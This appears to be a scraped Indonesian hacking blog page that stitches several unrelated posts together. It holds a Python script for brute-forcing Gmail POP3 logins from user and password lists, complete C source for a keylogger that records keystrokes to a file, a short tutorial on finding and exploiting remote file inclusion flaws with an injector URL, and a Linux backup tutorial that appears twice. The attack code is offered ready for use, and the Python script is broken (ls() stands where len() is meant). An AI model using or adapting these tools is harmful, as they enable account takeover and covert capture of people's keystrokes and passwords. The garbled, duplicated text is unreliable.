Gmail Brutusforce

#!usr/bin/python

#Gmail Pop3 Brute Forcer

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print “\n\t Xr0b0t[at]gmail[dot]com Gmail PopBruteForcer Beta v1.0″
print “\t ————————————————–\n”
print “\t Usage: ./gmail.py \n”
sys.exit(1)

server = “pop.gmail.com”
success = []

try:
users = open(sys.argv[1], “r”).readlines()
except(IOError):
print “[-] Error: Check your userlist path\n”
sys.exit(1)

try:
words = open(sys.argv[2], “r”).readlines()
except(IOError):
print “[-] Error: Check your wordlist path\n”
sys.exit(1)

try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = “No Response”
pass

print “\n\t Xr0b0t[at]gmail[dot]com Gmail PopBruteForcer Beta v1.0″
print “\t ————————————————–\n”
print “[+] Server:”,server
print “[+] Port: 995″
print “[+] Users Loaded:”,ls(users)
print “[+] Words Loaded:”,ls(words)
print “[+] Server response:”,welcome,”\n”

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if ls(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print “\n[-] Reloading Wordlist – Changing User\n”
reloader()
value = random.sample(words, 1)
users.remove(users[0])

lock.release()
if ls(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):
value, user = getword()

try:
print “-”*30
print “[+] User:”,user,”Password:”,value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print “\t\t\n\nLogin successful:”,user, value
print “\t\tMail:”,pop.stat()[0],”emails”
print “\t\tSize:”,pop.stat()[1],”bytes\n\n”
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print “An error occurred:”, msg
pass

for i in range(ls(words)*ls(users)):
work = Worker()
work.start()
time.sleep(1)
if ls(success) >=1:
print “\n\n[+] Mlebu cak:”,success[0], success[1]
print “\t[+] Mail:”,success[2],”emails”
print “\t[+] Size:”,success[3],”bytes\n”
print “\n[-] Mari\n”

[C]GetRawInputData() keylogger

Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level.


#define _WIN32_WINNT 0x0501
#include windows.h

// Definitions
int LogKey(HANDLE hLog, UINT vKey);
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow);

// Globals
const char g_szClassName[] = "klgClass";

// Window procedure of our message-only window
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
static HANDLE hLog;
UINT dwSize;
RAWINPUTDEVICE rid;
RAWINPUT *buffer;

switch(msg)
{
case WM_CREATE:
// Register a raw input device to capture keyboard input
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = hwnd;

if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
{
MessageBox(NULL, "Registering raw input device failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}

// open log.txt
hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hLog == INVALID_HANDLE_VALUE)
{
MessageBox(NULL, "Creating log.txt failed!", "Error",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}

// append
SetFilePointer(hLog, 0, NULL, FILE_END);
break;

case WM_INPUT:
// request size of the raw input buffer to dwSize
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize,
sizeof(RAWINPUTHEADER));

// allocate buffer for input data
buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);

if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize,
sizeof(RAWINPUTHEADER)))
{
// if this is keyboard message and WM_KEYDOWN, log the key
if(buffer->header.dwType == RIM_TYPEKEYBOARD
&& buffer->data.keyboard.Message == WM_KEYDOWN)
{
if(LogKey(hLog, buffer->data.keyboard.VKey) == -1)
DestroyWindow(hwnd);
}
}

// free the buffer
HeapFree(GetProcessHeap(), 0, buffer);
break;

case WM_DESTROY:
if(hLog != INVALID_HANDLE_VALUE)
CloseHandle(hLog);
PostQuitMessage(0);
break;

default:
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow)
{
WNDCLASSEX wc;
HWND hwnd;
MSG msg;

// register window class
ZeroMemory(&wc, sizeof(WNDCLASSEX));
wc.cbSize = sizeof(WNDCLASSEX);
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = g_szClassName;

if(!RegisterClassEx(&wc))
{
MessageBox(NULL, "Window Registration Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}

// create message-only window
hwnd = CreateWindowEx(
0,
g_szClassName,
NULL,
0,
0, 0, 0, 0,
HWND_MESSAGE, NULL, hInstance, NULL
);

if(!hwnd)
{
MessageBox(NULL, "Window Creation Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}

// the message loop
while(GetMessage(&msg, NULL, 0, 0) > 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}

return msg.wParam;
}

int LogKey(HANDLE hLog, UINT vKey)
{
DWORD dwWritten;
BYTE lpKeyboard[256];
char szKey[32];
WORD wKey;
char buf[32];
int len;

// Convert virtual-key to ascii
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
GetKeyboardState(lpKeyboard);

len = 0;
switch(vKey)
{
case VK_BACK:
len = wsprintf(buf, "[BP]");
break;
case VK_RETURN:
len = 2;
strcpy(buf, "\r\n");
break;
case VK_SHIFT:
break;
default:
if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1)
len = wsprintf(buf, "%c", (char)wKey);
else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0)
len = wsprintf(buf, "[%s]", szKey);
break;
}

// Write buf into the log
if(len > 0)
{
if(!WriteFile(hLog, buf, len, &dwWritten, NULL))
return -1;
}

return 0;
}

RFI turorial

Original Post By syaitonnirrojim
[+] sedikit tutorial bagaimana mendeteksi sebuah RFI vulnerabilty di dalam suatu CMS /php scripts

[+] dalam hal ini RFI adalah remote file include / inclusion dimana kita bisa melakukan require melalui injector //

[+] ok permisalan
1. misal file : function.php
2 di dalam source code funtion.php berisi scripts seperti

Code:

if(!$root['Path']){$root['Path'] = "./";}
include($root['Path']."config/config.php");

3. apabila dalam function.php gagal meng query / error di line XxX
kita dapat memasukkan injektor ..
4. dan code nya adalah :

Code:

http://127.0.0.1/path/function.php?root[Path]=

5. lalu tambahkan suatu injektor .. dan menjadi ..

Code:

http://127.0.0.1/path/function.php?root[Path]=http://127.0.0.1/injektor.txt

6. see what ? u got vuln woth RFI …
[+] sekedar tutorial dari saya .. mohon maaf apa bila ada salah / kekurangan dalam tutor ini ..
[+] ./e0f
[+] By masterhacked ~ original no copy paste ..

Backup dan Restoring Linux

langsung aja

cara merestor dan backup ubuntu

pertama tapa

kamu masuk root dulu

sudo -i atau sudo su

langsung menuju root directory

cd /

kemudian tulis command ini

tar cvpzf backup.tgz –exclude=/proc –exclude=/lost+found –exclude=/backup.tgz –exclude=/mnt –exclude=/sys /

itu untuk backup data kamu dll di ubuntu

kemudian untuk restor adalah sebagai berikut

tar xvpfz backup.tgz -C /

nah dari situ akan muncul hasilnya yank berbentuk

mkdir proc

mkdir lost+found

mkdir mnt

mkdir sys

etc…

Backup dan Restoring Linux

langsung aja

cara merestor dan backup ubuntu

pertama tapa

kamu masuk root dulu

sudo -i atau sudo su

langsung menuju root directory

cd /

kemudian tulis command ini

tar cvpzf backup.tgz –exclude=/proc –exclude=/lost+found –exclude=/backup.tgz –exclude=/mnt –exclude=/sys /

itu untuk backup data kamu dll di ubuntu

kemudian untuk restor adalah sebagai berikut

tar xvpfz backup.tgz -C /

nah dari situ akan muncul hasilnya yank berbentuk

mkdir proc

mkdir lost+found

mkdir mnt

mkdir sys

etc…